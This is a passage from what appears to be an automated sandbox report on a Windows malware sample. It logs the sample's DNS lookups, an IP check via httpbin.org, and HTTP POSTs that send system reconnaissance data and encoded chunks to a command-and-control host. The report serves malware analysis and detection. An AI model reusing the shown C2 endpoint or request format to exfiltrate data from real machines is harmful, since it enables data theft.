                                                          Dec 20, 2024 16:35:29.110168934 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:29.110183001 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:29.110240936 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.110251904 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.110294104 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:29.110411882 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.110423088 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.110435009 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.110444069 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.110455036 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:29.110676050 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.110687017 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.110698938 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.110707998 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.110716105 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.110773087 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.110783100 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.110793114 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.110846996 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.110858917 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.110869884 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.110878944 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.111088991 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.111099958 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.111108065 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.111118078 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.111125946 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.111267090 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.111278057 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.111288071 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.111296892 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.111306906 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.111454964 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.111464977 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.111473083 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.111484051 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.111563921 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.111701965 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.162126064 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.164953947 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.165004969 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:29.165196896 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:29.223799944 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.223865986 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.223949909 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.224133015 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.224205971 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.224242926 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.224262953 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.224275112 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.224385023 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.225758076 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.225822926 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.225889921 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.225900888 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.225951910 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.225963116 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.225972891 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.226038933 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.226049900 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.226090908 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.226102114 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.226114988 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.226172924 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.226183891 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.226236105 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.226247072 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.226257086 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.226311922 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.226324081 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.226336002 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.226437092 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.226449966 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.226459980 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.226469994 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.226509094 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.226521015 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.230175018 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.230221033 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.230231047 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.230293989 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.230393887 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.230422974 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.230514050 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.230525017 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.230582952 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.230604887 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.230686903 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.230699062 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.230768919 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.230865002 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.230925083 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.230935097 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.231054068 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.231092930 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.231156111 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.231167078 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.231240034 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.231259108 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.231338978 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.231349945 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.231420994 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.231566906 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.231592894 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.231920958 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.285818100 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.286050081 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.941343069 CET4970980192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:30.060920954 CET8049709185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:30.061083078 CET4970980192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:30.061448097 CET4970980192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:30.180926085 CET8049709185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:31.337925911 CET8049709185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:31.338026047 CET8049709185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:31.338299990 CET4970980192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:31.338567019 CET4970980192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:31.458056927 CET8049709185.121.15.192192.168.2.9

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Dec 20, 2024 16:35:23.787506104 CET6377653192.168.2.91.1.1.1
                                                          Dec 20, 2024 16:35:23.787606955 CET6377653192.168.2.91.1.1.1
                                                          Dec 20, 2024 16:35:24.075175047 CET53637761.1.1.1192.168.2.9
                                                          Dec 20, 2024 16:35:24.076867104 CET53637761.1.1.1192.168.2.9
                                                          Dec 20, 2024 16:35:27.310153008 CET6377953192.168.2.91.1.1.1
                                                          Dec 20, 2024 16:35:27.310282946 CET6377953192.168.2.91.1.1.1
                                                          Dec 20, 2024 16:35:27.447179079 CET53637791.1.1.1192.168.2.9
                                                          Dec 20, 2024 16:35:27.750389099 CET53637791.1.1.1192.168.2.9
                                                          Dec 20, 2024 16:35:29.802408934 CET6378153192.168.2.91.1.1.1
                                                          Dec 20, 2024 16:35:29.802460909 CET6378153192.168.2.91.1.1.1
                                                          Dec 20, 2024 16:35:29.940097094 CET53637811.1.1.1192.168.2.9
                                                          Dec 20, 2024 16:35:29.940167904 CET53637811.1.1.1192.168.2.9

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Dec 20, 2024 16:35:23.787506104 CET192.168.2.91.1.1.10x73dStandard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                                          Dec 20, 2024 16:35:23.787606955 CET192.168.2.91.1.1.10xcfb9Standard query (0)httpbin.org28IN (0x0001)false
                                                          Dec 20, 2024 16:35:27.310153008 CET192.168.2.91.1.1.10xe809Standard query (0)home.fivetk5ht.topA (IP address)IN (0x0001)false
                                                          Dec 20, 2024 16:35:27.310282946 CET192.168.2.91.1.1.10xcf63Standard query (0)home.fivetk5ht.top28IN (0x0001)false
                                                          Dec 20, 2024 16:35:29.802408934 CET192.168.2.91.1.1.10xe838Standard query (0)home.fivetk5ht.topA (IP address)IN (0x0001)false
                                                          Dec 20, 2024 16:35:29.802460909 CET192.168.2.91.1.1.10xdc4bStandard query (0)home.fivetk5ht.top28IN (0x0001)false

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Dec 20, 2024 16:35:24.075175047 CET1.1.1.1192.168.2.90x73dNo error (0)httpbin.org98.85.100.80A (IP address)IN (0x0001)false
                                                          Dec 20, 2024 16:35:24.075175047 CET1.1.1.1192.168.2.90x73dNo error (0)httpbin.org34.226.108.155A (IP address)IN (0x0001)false
                                                          Dec 20, 2024 16:35:27.447179079 CET1.1.1.1192.168.2.90xe809No error (0)home.fivetk5ht.top185.121.15.192A (IP address)IN (0x0001)false
                                                          Dec 20, 2024 16:35:29.940097094 CET1.1.1.1192.168.2.90xe838No error (0)home.fivetk5ht.top185.121.15.192A (IP address)IN (0x0001)false

                                                          HTTP Request Dependency Graph

                                                          • httpbin.org
                                                          • home.fivetk5ht.top

                                                          HTTP Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.949708185.121.15.192807696C:\Users\user\Desktop\HZhObFuFNe.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 20, 2024 16:35:27.873132944 CET12360OUTPOST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1
                                                          Host: home.fivetk5ht.top
                                                          Accept: */*
                                                          Content-Type: application/json
                                                          Content-Length: 444282
                                                          Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 30 38 39 32 35 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 [TRUNCATED]
                                                          Data Ascii: { "ip": "8.46.123.189", "current_time": "1734708925", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 584 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 880 }, { "name": "svchost.exe", "pid": 928 }, { "name": "dwm.exe", "pid": 992 }, { "name": "svchost.exe", "pid": 436 }, { "name": "svchost.exe", "pid": 376 }, { "name": "svchost.exe", "pid": 792 }, { "name": "svchost.exe", "pid": [TRUNCATED]
                                                          Dec 20, 2024 16:35:27.993349075 CET4944OUTData Raw: 78 45 45 42 53 45 78 42 68 4a 42 55 51 64 68 63 52 4d 69 4d 6f 45 49 46 45 4b 52 6f 62 48 42 43 53 4d 7a 55 76 41 56 59 6e 4c 52 43 68 59 6b 4e 4f 45 6c 38 52 63 59 47 52 6f 6d 4a 79 67 70 4b 6a 55 32 4e 7a 67 35 4f 6b 4e 45 52 55 5a 48 53 45 6c
                                                          Data Ascii: xEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6\/9oADAMBAAIRAxEAPwDh6Kc\/3j+H8h
                                                          Dec 20, 2024 16:35:27.993422031 CET4944OUTData Raw: 65 5a 38 36 5a 54 70 5c 2f 72 4d 5c 2f 35 36 66 68 51 48 38 74 59 74 6e 6d 66 75 34 73 65 5a 5c 2f 30 77 2b 31 66 35 5c 2f 6e 36 6d 67 36 43 74 5c 2f 45 6d 39 50 6b 5c 2f 35 61 70 4a 2b 5c 2f 67 2b 74 31 2b 58 34 66 70 51 33 2b 73 68 66 5c 2f 58
                                                          Data Ascii: eZ86ZTp\/rM\/56fhQH8tYtnmfu4seZ\/0w+1f5\/n6mg6Ct\/Em9Pk\/5apJ+\/g+t1+X4fpQ3+shf\/XH\/lrJ24\/z+tPjCRtv2SIlx+9I\/wBR\/wBuvv8Az9+1Mkz9wfJ+98r\/AEjr\/nP+TXQAz\/lpN\/B5cX\/LT9\/P\/n\/9XrRJ+73\/AL6X93+9h\/z+Xt9ehANrP\/rNnm\/uv3X+f\/r4B60\/\/Ym+TzP9b
                                                          Dec 20, 2024 16:35:27.993652105 CET2472OUTData Raw: 5c 2f 6e 5c 2f 50 76 33 39 71 73 73 75 33 33 46 51 79 64 76 78 5c 2f 70 51 64 68 51 2b 66 35 2b 50 76 39 65 6e 51 66 35 39 75 61 58 64 5c 2f 79 7a 37 66 5c 2f 41 46 76 70 56 6e 79 2b 64 5c 2f 38 41 2b 76 72 31 2b 6d 65 33 72 37 56 56 6b 6a 2b 58
                                                          Data Ascii: \/n\/Pv39qssu33FQydvx\/pQdhQ+f5+Pv9enQf59uaXd\/yz7f\/AFvpVny+d\/8A+vr1+me3r7VVkj+X\/WfXnP8An\/IoNKfX5fqHmf8A23t1P4\/y6fjUMjeZ1z\/rP8+vvQ3Rf+uX9BTPnb2\/T\/69BoLJuzu2bP8Atlj\/AD61Vw+N38X0746+vX2z3qWTt\/rO\/wDSmyK\/Kdef9Z\/n9Ov86Dr535f18yvznfs\/7
                                                          Dec 20, 2024 16:35:27.993774891 CET4944OUTData Raw: 2f 4a 5c 2f 71 5c 2f 77 44 57 5c 2f 77 43 65 5c 2f 77 44 6e 70 7a 6d 6d 53 52 5c 2f 78 37 4e 6e 5c 2f 41 45 30 4d 76 6e 34 36 2b 76 34 5c 2f 5c 2f 72 6f 39 72 35 79 5c 2f 72 35 67 4d 32 70 48 4a 76 54 35 78 5c 2f 72 5a 66 2b 6d 33 36 66 31 78 33
                                                          Data Ascii: /J\/q\/wDW\/wCe\/wDnpzmmSR\/x7Nn\/AE0Mvn46+v4\/\/ro9r5y\/r5gM2pHJvT5x\/rZf+m36f1x360u7924TzN8cX8EX1\/z\/AF5p0f8Ac3xp5kX+s\/5YQ9\/8\/wAxTPM\/eb98n59\/59e1UdBDJH5Wx0yif+icfX0+nFDyI3zokSPH+6\/1v7ib+n15p+75o3Rf+WVxx5R\/wzTNr\/J5f\/PLzf8AnhP+f\/1+l
                                                          Dec 20, 2024 16:35:27.994050026 CET4944OUTData Raw: 36 63 66 58 6a 72 51 64 68 44 39 35 66 6e 39 4f 6b 66 50 2b 66 62 38 65 4b 68 62 2b 35 74 2b 6d 66 35 5c 2f 35 50 31 37 31 63 6b 54 35 55 2b 54 5c 2f 41 4c 39 35 5c 2f 70 36 66 58 5c 2f 36 38 4d 59 54 35 33 5c 2f 6a 5c 2f 41 4f 57 76 2b 66 38 41
                                                          Data Ascii: 6cfXjrQdhD95fn9OkfP+fb8eKhb+5t+mf5\/5P171ckT5U+T\/AL95\/p6fX\/68MYT53\/j\/AOWv+f8AP60FUun+H\/Ih8v8A6Y1FJ+fHm\/63rUsh\/wBjZ\/10l\/Xp\/nHSmf3E2x89e3k\/Sg7iGTZ8j\/cfP\/PXj\/I7dvwpnz\/fRN\/\/AE7\/AID8z\/TinD7kf\/tT\/j4\/z600\/ed+d8f7rzP85PJ+lAe1\/
                                                          Dec 20, 2024 16:35:27.996177912 CET2472OUTData Raw: 64 34 77 2b 49 31 5c 2f 72 6c 5c 2f 4e 38 50 50 32 65 5c 2f 69 48 34 5a 30 79 53 44 34 64 65 43 39 51 38 64 57 2b 6e 58 33 69 53 48 55 64 56 38 4f 36 6a 6f 4d 2b 6a 32 75 6f 58 75 71 77 57 49 78 49 50 37 41 31 4c 78 5a 38 4d 66 44 6e 68 6e 34 6b
                                                          Data Ascii: d4w+I1\/rl\/N8PP2e\/iH4Z0ySD4deC9Q8dW+nX3iSHUdV8O6joM+j2uoXuqwWIxIP7A1LxZ8MfDnhn4k\/DDxpoXxf+G2pfGDwR8T\/Dd98RrH4cXfwz8N3nxCtPHHi7UZ\/Hvwu8DeOdL0\/wAvwr8eXni2O48CG7s7PQLiayt9Q823Evw+S8RfR74c45424oyDHcOZLxlxnhMsfHOa4Sjj8BT4gp8GR4qll2OzCo6FLJ8Zj
                                                          Dec 20, 2024 16:35:28.113584042 CET4944OUTData Raw: 5a 2b 75 5c 2f 32 6c 49 37 54 55 37 78 50 43 72 58 73 48 69 52 50 68 35 5a 53 77 54 57 64 70 70 64 39 70 4b 65 49 58 69 73 30 31 71 58 54 47 66 57 49 35 6b 6b 6e 54 51 50 38 41 68 4c 64 59 31 54 77 56 6f 50 68 46 5c 2f 68 4e 38 45 5c 2f 69 6c 70
                                                          Data Ascii: Z+u\/2lI7TU7xPCrXsHiRPh5ZSwTWdppd9pKeIXis01qXTGfWI5kknTQP8AhLdY1TwVoPhF\/hN8E\/ilp3ifUde8Qf2T4g1D9obwBpnxO+FXwj8MfZ\/Bc1\/r\/wAXNc8G6kdX1DQ7Gxbwz4asNO1LWfEvjDSfDcdrrd39bwdlH0W\/D7iTB5rwji8oyniSvgo0cFNZ9xXmNethc3xmOyunRpYPMsyx1CpWx2OyfMMFh6X1d4
                                                          Dec 20, 2024 16:35:28.113681078 CET4944OUTData Raw: 4f 52 77 63 6a 6b 63 56 78 65 74 66 44 71 38 38 53 79 2b 44 39 50 38 41 45 50 6a 66 78 58 71 76 67 62 34 65 36 68 71 65 72 65 41 5c 2f 68 72 50 71 6d 6f 74 34 45 38 48 36 72 72 64 77 6c 7a 72 75 70 2b 47 5c 2f 44 4d 75 6f 54 36 4a 6f 6d 6f 61 35
                                                          Data Ascii: ORwcjkcVxetfDq88Sy+D9P8AEPjfxXqvgb4e6hqereA\/hrPqmot4E8H6rrdwlzrup+G\/DMuoT6Jomoa5PFDLq97pem2dzqUkMb3kk7Iu38Yx30RcTlvD0cj4b4uzXEVcZSyzKMVmWPxFCjjMsymOYY3E53i8vr0MPRxFPGZjgc0zLK4UMHVwmDpUcTDEyw9bFUqlTE\/0DgPp14XOuI6me8XcDZHhaGCnnWdYbK8uwVbEYHOs
                                                          Dec 20, 2024 16:35:28.113704920 CET2472OUTData Raw: 41 30 43 5c 2f 38 61 5c 2f 55 30 48 68 72 51 4c 57 51 54 57 32 69 61 50 62 7a 4c 39 32 57 44 53 37 4b 47 52 66 6f 38 63 4b 73 4f 67 36 47 70 35 74 44 30 69 35 6e 57 36 75 4e 4d 30 36 34 75 55 4a 4b 58 45 31 68 62 53 7a 71 54 31 4b 7a 53 52 74 49
                                                          Data Ascii: A0C\/8a\/U0HhrQLWQTW2iaPbzL92WDS7KGRfo8cKsOg6Gp5tD0i5nW6uNM064uUJKXE1hbSzqT1KzSRtIpPchhXjVfoW5BXp5nOXGWc0MfmVHMcF9awuFy+n9TwGa1eJ6+MpYSMsNNLERr8W5pVwuLrqviaFSnl9RVnPB0pL6Sj+0E4loVcBThwFkdfA4LC5dTnQxWNzSpWxmKyiHCsMBXxFeGMhNQh\/qflEq2Hw0sPh60vri
                                                          Dec 20, 2024 16:35:28.113873959 CET2472OUTData Raw: 76 2b 41 61 55 2b 76 79 5c 2f 55 68 7a 74 51 48 5c 2f 50 50 50 4e 56 74 79 5c 2f 50 76 37 5c 2f 58 6e 48 54 5c 2f 41 44 33 7a 56 7a 79 5c 2f 76 5c 2f 35 5c 2f 48 2b 5a 5c 2f 4c 46 56 76 2b 57 66 33 4e 5c 2f 41 5c 2f 6c 6a 39 42 37 31 50 73 5c 2f
                                                          Data Ascii: v+AaU+vy\/UhztQH\/PPPNVty\/Pv7\/XnHT\/AD3zVzy\/v\/5\/H+Z\/LFVv+Wf3N\/A\/lj9B71Ps\/P8AD\/gmhFtB+fP+r\/55\/wCf8\/hUf\/LTZsj\/ADOf5\/8A1+2O9P8An+Tf8\/mf\/W\/D1xz09qZ94u\/3zJ6\/Xt\/Ssf33946Bg6v9G\/nVNt7M\/wA\/v+86f561awfM8v8Az1\/z\/jSSRo3P080\/5\/
                                                          Dec 20, 2024 16:35:29.162126064 CET212INHTTP/1.0 503 Service Unavailable
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.2.949709185.121.15.192807696C:\Users\user\Desktop\HZhObFuFNe.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 20, 2024 16:35:30.061448097 CET284OUTPOST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1
                                                          Host: home.fivetk5ht.top
                                                          Accept: */*
                                                          Content-Type: application/json
                                                          Content-Length: 143
                                                          Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 5c 2f 68 31 3e 5c 6e 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                                          Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
                                                          Dec 20, 2024 16:35:31.337925911 CET212INHTTP/1.0 503 Service Unavailable
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                          HTTPS Proxied Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.94970798.85.100.804437696C:\Users\user\Desktop\HZhObFuFNe.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-20 15:35:25 UTC52OUTGET /ip HTTP/1.1
                                                          Host: httpbin.org
                                                          Accept: */*
                                                          2024-12-20 15:35:26 UTC224INHTTP/1.1 200 OK
                                                          Date: Fri, 20 Dec 2024 15:35:26 GMT
                                                          Content-Type: application/json
                                                          Content-Length: 31
                                                          Connection: close
                                                          Server: gunicorn/19.9.0
                                                          Access-Control-Allow-Origin: *
                                                          Access-Control-Allow-Credentials: true
                                                          2024-12-20 15:35:26 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                          Data Ascii: { "origin": "8.46.123.189"}


                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          System Behavior

                                                          General

                                                          Target ID:0
